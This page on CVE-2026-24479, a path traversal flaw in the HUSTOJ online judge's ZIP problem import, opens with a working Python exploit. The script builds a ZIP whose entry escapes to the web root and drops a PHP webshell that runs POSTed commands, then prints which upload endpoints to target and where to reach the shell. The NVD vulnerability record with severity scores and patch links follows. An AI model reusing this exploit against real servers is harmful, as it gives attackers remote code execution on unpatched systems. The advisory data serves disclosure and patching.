CVE-2026-24479

import zipfile import os def create_malicious_zip(): """ Generate malicious ZIP file for CVE-2026-24479 path traversal exploit Target: HUSTOF problem_import_qduoj.php or problem_import_hoj.php """ # Malicious filename with path traversal sequence malicious_filename = '../../../../var/www/html/shell.php' # Webshell content - simple PHP command execution webshell_content = b'<?php @eval($_POST["cmd"]); ?>' # Create ZIP file with malicious entry with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr(malicious_filename, webshell_content) print('Malicious ZIP created: exploit.zip') print(f'Entry name: {malicious_filename}') print('Upload to: /problem_import_qduoj.php or /problem_import_hoj.php') print('Access shell at: http://target/shell.php') if __name__ == '__main__': create_malicious_zip()

{"cve": {"id": "CVE-2026-24479", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.017", "lastModified": "2026-03-02T21:32:57.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HUSTOF is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. Prior to version 26.01.24, the problem_import_qduoj.php and problem_import_hoj.php modules fail to properly sanitize filenames within uploaded ZIP archives. Attackers can craft a malicious ZIP file containing files with path traversal sequences (e.g., ../../shell.php). When extracted by the server, this allows writing files to arbitrary locations in the web root, leading to Remote Code Execution (RCE). Version 26.01.24 contains a fix for the issue."}, {"lang": "es", "value": "HUSTOF es un juez en línea de código abierto basado en PHP/C++/MySQL/Linux para entrenamiento de ACM/ICPC y NOIP. Antes de la versión 26.01.24, los módulos problem_import_qduoj.php y problem_import_hoj.php no logran sanear correctamente los nombres de archivo dentro de los archivos ZIP subidos. Los atacantes pueden crear un archivo ZIP malicioso que contenga archivos con secuencias de salto de ruta (p. ej., ../../shell.php). Cuando es extraído por el servidor, esto permite escribir archivos en ubicaciones arbitrarias en la raíz web, lo que lleva a la Ejecución Remota de Código (RCE). La versión 26.01.24 contiene una solución para el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hustoj:hustoj:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.01.24", "matchCriteriaId": "3C2DFB45-A477-4B77-A437-C7F3C810B8B6"}]}]}], "references": [{"url": "https://github.com/zhblue/hustoj/commit/902bd09e6d0011fe89cd84d4236899314b33101f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zhblue/hustoj/security/advisories/GHSA-xmgg-2rw4-7fxj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}